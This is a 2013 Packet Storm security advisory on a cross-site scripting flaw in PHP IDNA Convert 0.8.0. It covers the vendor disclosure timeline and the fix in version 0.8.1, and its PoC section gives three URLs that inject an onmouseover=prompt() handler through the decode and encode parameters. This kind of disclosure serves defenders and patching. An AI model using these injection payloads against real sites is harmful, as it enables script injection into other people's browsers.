PHP IDNA Convert 0.8.0 Cross Site Scripting

2013-09-28T00:00:00
ID PACKETSTORM:123447
Type packetstorm
Reporter Alexandro Silva
Modified 2013-09-28T00:00:00

Description

                                        
                                            `[ PHP IDNA Convert Cross-site scripting ( XSS ) ]  
  
[ Vendor product description]  
  
PHP Net_IDNA is a class to convert between the Punycode and Unicode  
formats. Punycode is a standard described in RFC 3492 and part of IDNA  
(Internationalizing Domain Names in Applications [RFC3490]) . This class  
allows PHP scripts to convert these domain names without having one of  
the PHP extensions installed. It supports both IDNA 2003 and IDNA 2008.  
  
[ Bug Description ]  
  
Cross-site scripting (XSS) vulnerability in parameters encoded/decoded  
in the class PHP IDNA Convert allows remote attackers to inject  
arbitrary web script or HTML.  
  
[ History ]  
  
Advisory sent to vendor on 09/24/2013  
Vendor reply on 09/25/2013  
Vulnerability fixed on 09/26/2013  
  
[ Impact ]  
  
HIGH  
  
[ Afected Version ]  
  
0.8.0  
  
[ Vendor Reply ]  
  
Yes. Version 0.8.1 released  
  
[ CVE Reference ]  
  
  
  
[ PoC ]  
  
Payloads:  
  
http://[host]/idna_convert/index.php?decoded=94102%22%20onmouseover%3dprompt(929882)%20bad%3d%22&encode=Encode%20>>&idn_version=2003  
  
http://[host]/idna_convert/example.php?decode=<<%20Decode&encoded=94102%22%20onmouseover%3dprompt(938200)%20bad%3d%22  
  
http://[host]/index.php/%22onmouseover%3d%27prompt%28976724%29%27bad%3d%22%3E  
  
[ References ]  
  
[1] PHP IDNA Convert - http://phlymail.com/en/downloads/idna-convert.html  
  
[2] Owasp Cross-site scripting -  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/  
  
--------------------------------------------  
iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos  
  
alexos (at) ibliss.com (dot) br [email concealed]  
`